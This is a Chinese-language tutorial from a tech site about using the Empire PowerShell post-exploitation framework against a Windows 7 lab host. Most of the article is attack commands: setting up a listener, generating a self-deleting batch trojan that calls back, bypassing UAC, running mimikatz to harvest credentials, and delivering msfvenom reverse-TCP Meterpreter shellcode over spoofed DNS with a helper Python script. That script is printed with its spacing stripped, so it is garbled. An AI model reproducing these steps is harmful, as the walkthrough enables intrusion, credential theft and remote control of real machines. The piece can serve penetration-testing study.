您当前的位置:首页 > 电脑百科 > 安全防护 > 软件工具

内网渗透力杠杠的工具学习之Empire后渗透

时间:2020-03-01 13:17:53  来源:  作者:

内网渗透力杠杠的工具学习之Empire后渗透

 

 

前言:

Empire一款基于PowerShell的后渗透测试工具。感谢某葵和某Egg的推荐和指点。感谢某骗子给我解惑DNS的一些东西。

 

安装:

  • github项目地址:https://github.com/EmpireProject/Empire
  • 下载:git clone https://github.com/EmpireProject/Empire.git
内网渗透力杠杠的工具学习之Empire后渗透

 

  • Empiresetup目录执行install.sh文件./install.sh

 

内网渗透力杠杠的工具学习之Empire后渗透

 

开始下载安装运行依赖文件

最后设置数据库密码那里可以默认回车,也可以自己设置

踩坑经历:

 

如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件。

 

  • 使用(Empire)> listeners # 监听
    • 监听

 

内网渗透力杠杠的工具学习之Empire后渗透

 

(Empire: listeners) > uselistener http #选择监听方式

 

内网渗透力杠杠的工具学习之Empire后渗透

 

(Empire: listeners/http) > info #查看需要配置的选项

 

内网渗透力杠杠的工具学习之Empire后渗透

 

(Empire: listeners/http) > set Name backdoor #设置监听名字

内网渗透力杠杠的工具学习之Empire后渗透

 

养成良好的习惯设置自己容易理解的名字,方便管理shell

(Empire: listeners/http) > set Host http://192.168.80.131:4447 #设置木马反弹回连地址

(Empire: listeners/http) > set Port 4447 #设置本地监听端口

内网渗透力杠杠的工具学习之Empire后渗透

 

(Empire: listeners/http) > execute #执行监听

 

内网渗透力杠杠的工具学习之Empire后渗透

 

至此,监听工作完成。我们开始配置生成后门。

  • 生成木马(Empire: listeners/http) > back #返回上层模块(Empire: listeners) > usestager windows/launcher_bat backdoor # 选择木马种类

 

内网渗透力杠杠的工具学习之Empire后渗透

 

这里我选择的是bat类型的脚本,当然你们可以选择其他的。后面的backdoor就是刚刚我们设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机。

(Empire: stager/windows/launcher_bat) > info #查看需要配置的

 

内网渗透力杠杠的工具学习之Empire后渗透

 

你可以set OutFile 到你指定的目录(绝对路径)

(Empire: stager/windows/launcher_bat) > execute #执行生成木马

内网渗透力杠杠的工具学习之Empire后渗透

 

我们把tmp目录下的文件拷贝到我们的目标主机上运行

内网渗透力杠杠的工具学习之Empire后渗透

 

弹出一个黑框后,它自动消失了,是因为我们刚才生成backdoor的时候其中一个选项delete设置的True,运行结束后删除自身。

 

内网渗透力杠杠的工具学习之Empire后渗透

 

点击完我们的backdoor之后,我们回到我们的机器可以看到已经获取到了客户端的一个会话。

(Empire: stager/windows/launcher_bat) > agents #查看获取的代理会话

 

内网渗透力杠杠的工具学习之Empire后渗透

 

一个会话已经建立完成。

(Empire: agents) > rename HZFT7AX1 win7pro #更改会话名字

 

内网渗透力杠杠的工具学习之Empire后渗透

 

养成一个良好的习惯。

(Empire: agents) > interact win7pro #和该会话交互

 

内网渗透力杠杠的工具学习之Empire后渗透

 

从session_key这里可以看出我们的会话是经过加密的。

同时该框架还提供了bypassuac,mimikaz等模块,为渗透提供高效,快速的提升权限,信息获取。

正好结合这个说一个dns传输backdoor payload的方式

  • NativePayload_DNS项目地址:https://github.com/DamonMohammadbagher/NativePayload_DNS.git首先编译源码生成可执行文件使用visual studio 工具命令编译!
内网渗透力杠杠的工具学习之Empire后渗透

 

生成NativePayload_DNS.exe 。

上传到我们攻击的机器上去,进入到交互界面。

首先我们先试试利用bypassuac这个功能,看看是否可以提升权限获取该机器管理员的密码,直接运行mimikatz是会报错的。

 

内网渗透力杠杠的工具学习之Empire后渗透

 

运行后我们看到有第二个会话开始建立中,稍等片刻

(Empire: win7pro) > agents #列举代理会话

 

内网渗透力杠杠的工具学习之Empire后渗透

 

细心的人可能发现多了一个*号那个usename那里

(Empire: agents) > rename 8TKB4G9S win7proprivilege #这里我说了三遍,很重要。

(Empire: agents) > interact win7proprivilege #和这个会话交互

 

内网渗透力杠杠的工具学习之Empire后渗透

 

(Empire: win7proprivilege) > mimikatz #使用mimikatz

 

内网渗透力杠杠的工具学习之Empire后渗透

 

(Empire: win7proprivilege) > upload /root/Desktop/NativePayload_DNS.exe #上传

(Empire: win7proprivilege) > shell dir #查看是否上传成功.

 

内网渗透力杠杠的工具学习之Empire后渗透

 

开始配置服务端

msfvenom--platformwindows--archx64-pwindows/x64/meterpreter/reverse_tcplhost=192.168.80.131lport=4444-fc>/root/Desktop/payload.txt

#生成shellcode

 

内网渗透力杠杠的工具学习之Empire后渗透

 

这里申明下,网上的命令可能因为文章格式问题,导致命令不对,这里我做了修正。写了一个转换脚本,代码如下(一把梭,勿喷):

#!/usr/bin/Python2#!-*-coding:utf-8-*-a=''f=open("payload.txt","rb")line=f.readlines()[1:]f.close()forlinesinrange(len(line)):ipls='1.1.1.%s'%linesshellcode=line[lines].replace(";","").strip().rstrip(""")+".1.com"+"""text=ipls+""+"""+"0x"+shellcode.lstrip(""")a+=text.replace("","0")+"n"fn=open("dns.txt","wb")fn.write(a)fn.close()

这里网上给出的样例也有问题,看了好久发现传输的payload缺少了一个"0x",于是在dns.txt做了修改。一直被老哥教育细心,耐心,这回总算用成了一回。

开启msf监听,这里就不再赘述了。

 

内网渗透力杠杠的工具学习之Empire后渗透

 

开启欺骗

root@localhost# dnsspoof -f dns.txt

 

内网渗透力杠杠的工具学习之Empire后渗透

 

服务端配置完成,现在回到我们的empire会话执行命令,获取meterpreter shell.

(Empire: win7proprivilege) > shell NativePayload_DNS.exe 1.1.1. 34 192.168.80.131 #执行

 

内网渗透力杠杠的工具学习之Empire后渗透

 

这个比较慢,需要稍等会,等它传输完,就会返回shell。

 

一张图证明empire绕过了UAC:

 

内网渗透力杠杠的工具学习之Empire后渗透

 

 



Tags:Empire   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
前言:Empire一款基于PowerShell的后渗透测试工具。感谢某葵和某Egg的推荐和指点。感谢某骗子给我解惑DNS的一些东西。 安装: github项目地址:https://github.com/EmpireProj...【详细内容】
2020-03-01  Tags: Empire  点击:(113)  评论:(0)  加入收藏
经历漫长的等待后,后渗透测试神器 Empire 终于迎来了多项重大功能升级的 3.0 版本(https://github.com/BC-SECURITY/Empire/)。Empire 是一款类似 Metasploit 的 PowerShell 可...【详细内容】
2019-12-26  Tags: Empire  点击:(161)  评论:(0)  加入收藏
▌简易百科推荐
已经观察到一种新的基于JavaScript的远程访问木马(RAT)利用社会工程学传播,采用隐蔽的"无文件"技术作为其逃避检测和分析的方法。该恶意软件由Prevalyion的对抗性反情报团队(PA...【详细内容】
2021-12-17  网安老葫    Tags:恶意软件   点击:(13)  评论:(0)  加入收藏
关于windows Defender防病毒的问题升级win10后,我们会经常遇到打开或下载文件时弹出提示框提示你下载的文件是病毒之类,直接给你删除。你好不容易找了个激活工具,你刚打开发现...【详细内容】
2021-11-08  IT小哥吧    Tags:defender   点击:(47)  评论:(0)  加入收藏
喽!大家好,我是小易,欢迎来到我的知识分享站!今天给大家分享5个杀毒神器,让你的电脑干干净净,建议收藏起来哟! 1、Windows Defender随着Win10系统的更新已经日趋完善,它可以很好的解...【详细内容】
2021-11-08  知识与技能    Tags:流氓软件   点击:(74)  评论:(0)  加入收藏
介绍其实Iptables服务不是真正的防火墙,只是用来定义防火墙规则功能的"防火墙管理工具",将定义好的规则交由内核中的netfilter即网络过滤器来读取,从而真正实现防火墙功能。fil...【详细内容】
2021-10-18  互联网IT技术全栈    Tags:   点击:(52)  评论:(0)  加入收藏
什么是Nessus?Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件步骤如下:查看当前kali系统内核版本...【详细内容】
2021-09-09  TestGO    Tags:Nessus   点击:(112)  评论:(0)  加入收藏
http 头部信息http头部信息经常包含着主机服务的一些版本信息,经常使用的字段信息有:Server, X-Powered-By, X-AspNet-Version工具可采用curl进行curl --location --head $URL...【详细内容】
2021-08-19  80后IT老民工    Tags:渗透   点击:(227)  评论:(0)  加入收藏
一、杀软常见的三种方式二、免杀的三种常用方式三、利用工具实现免杀1、veil工具基础实现免杀+进阶2、venom免杀3、利用kali自带的shellter进行免杀4、利用avet实现免杀四、...【详细内容】
2021-08-18  白帽hacker淬炼    Tags:免杀   点击:(82)  评论:(0)  加入收藏
关于工具现有工具现在,现成的污点分析工具已经有很多了。其中,我最感兴趣的是Triton和bincat,因为两者已经相当成熟。然而,我们却无法使用这两种工具,因为它们不支持目标设备所...【详细内容】
2021-08-12  Hbo涵    Tags:安全漏洞   点击:(94)  评论:(0)  加入收藏
从实现原理上分,防火墙的技术包括四大类:网络级防火墙、应用级网关、电路级网关和规则检查防火墙。1、网络级防火墙一般是基于源地址和目的地址、应用、协议以及每个IP包的端...【详细内容】
2021-07-20  趣谈文化  搜狐号  Tags:防火墙   点击:(225)  评论:(0)  加入收藏
一、VMware部分1、Vmware简介虚拟机就是一个用来模拟真实的物理机环境的一个软件,可以在虚拟机中安装不同版本的操作系统。就是一个把下载好的ISO安装在物理机操作系统的一个...【详细内容】
2021-07-12  Kali与编程  公众号  Tags:Kali Linux   点击:(113)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条